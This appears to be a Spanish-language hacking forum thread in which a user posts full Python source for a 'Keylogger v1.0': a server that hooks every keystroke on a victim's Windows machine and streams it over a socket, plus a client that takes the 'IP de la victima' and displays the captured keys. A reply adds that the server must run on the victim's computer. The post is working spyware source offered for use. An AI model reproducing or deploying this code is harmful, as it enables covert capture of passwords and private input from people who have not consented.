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Locked [Python] Keylogger v1.0 [By Expermicid]


Expermicid

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Hola a todos.

 

Hoy como a la tarde tuve un dia de lluvia me puse e hice este pequeño code.

 

Buscando informacion por San Google encontre las apis pythoncom y pyHook e hice mi version de un keylogger.

Esta muy basico y tengo pensado mejorar el codigo.

 

Pero para la version 1.0 creo que es demasiado xD

Asi que lo comparto.

 

Cliente:

 

[lenguaje=python]#!/usr/bin/env python

 

##################################

## ##

## Keylogger v1.0 ##

## By Expermicid ##

## Fecha : 15/10/12 ##

## Cliente ##

## ##

##################################

 

import socket

import os, sys

 

print '\nKeylogger v1.0 --- By Expermicid\n'

ipVictima = raw_input('introduzca la IP de la victima >>> ')

host = ipVictima

port = 5000

addr = (host, port)

try :

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(addr)

except s.error:

print 'Error de coneccion :('

raw_input()

else:

print 'Coneccion exitosa :)\n'

texto = ''

while True :

recibido = s.recv(1024)

texto += recibido

sys.stdout.write(os.popen('clear').read())

print texto[/lenguaje]

 

Server:

 

[lenguaje=python]##################################

## ##

## Keylogger v1.0 ##

## By Expermicid ##

## Fecha : 15/10/12 ##

## Server ##

## ##

##################################

 

import socket

import pythoncom, pyHook

 

def OnKeyboardEvent(event) :

# letras minusculas y letras mayusculas

if (event.Ascii > 64 and event.Ascii < 91) or (event.Ascii > 96 and event.Ascii < 123) :

sc.send(chr(event.Ascii))

# numeros

elif event.Ascii > 47 and event.Ascii < 58 :

sc.send(chr(event.Ascii))

# F1 .. F12

elif event.KeyID > 111 and event.KeyID < 124 and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

# Espacio

elif event.Ascii == 32 :

sc.send(chr(event.Ascii))

# Enter

elif event.Ascii == 13 :

sc.send(' [intro] ')

# BackSpace

elif event.Ascii == 8 :

sc.send(' [backSpace] ')

# Escape

elif event.Ascii == 27 :

sc.send(' [Escape] ')

# Tab

elif event.Ascii == 9 :

sc.send(' [Tab] ')

# Flechas

elif event.KeyID > 36 and event.KeyID < 41 and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

# Bloq Mayus

elif event.KeyID == 20 and event.Ascii == 0 :

sc.send(' [bloqMayus] ')

# caracteres

elif event.Ascii > 32 and event.Ascii < 48 :

sc.send(chr(event.Ascii))

# caracteres

elif event.Ascii > 57 and event.Ascii < 65 :

sc.send(chr(event.Ascii))

# caracteres

elif event.Ascii > 90 and event.Ascii < 97 :

sc.send(chr(event.Ascii))

# caracteres

elif event.Ascii > 122 and event.Ascii < 127 :

sc.send(chr(event.Ascii))

# Insetar / Delete

elif event.KeyID > 44 and event.KeyID < 47 and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

# ascii extendido

elif event.Ascii > 127 and event.Ascii < 255 :

sc.send(chr(event.Ascii))

# Flechas

elif event.KeyID > 159 and event.KeyID < 166 and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

# Win / Apps

elif (event.KeyID == 91 or event.KeyID == 93) and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

# Inicio-Fin / RePag-AvPag

elif event.KeyID > 32 and event.KeyID < 37 and event.Ascii == 0 :

sc.send(' ['+event.Key+'] ')

 

try:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind((socket.gethostname(), 5000))

s.listen(1)

sc, addr = s.accept()

except s.error:

print 'Error de coneccion :('

else:

hm = pyHook.HookManager()

hm.KeyDown = OnKeyboardEvent

hm.HookKeyboard()

pythoncom.PumpMessages()

[/lenguaje]

 

Probado, cliente en GNU/Linux y el server en Windows (Maquina virtual)

 

Al ejectura el cliente nos pide ingresar la IP de la victima.

 

This is the hidden content, please

 

Si se puede conectar a la victima avisa y queda listo para captar las teclas apretadas:

 

This is the hidden content, please

 

Teclas capturadas:

 

This is the hidden content, please

 

Cualquier duda, consulta, sugerencia, correccion son 'escuchadas' leidas y bienvenidas. xD

 

Saludos

Edited by Expermicid
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Re: [Python] Keylogger v1.0 [by Expermicid]

 

como es que yo con solo poner la ip de mi victima ya capturo las teclaspulsadas??

 

No es tan facil asi.

Si veras hay dos codes. El cliente es el que tienes tu en tu pc y el server es el codigo que tiene que correr en la victima.

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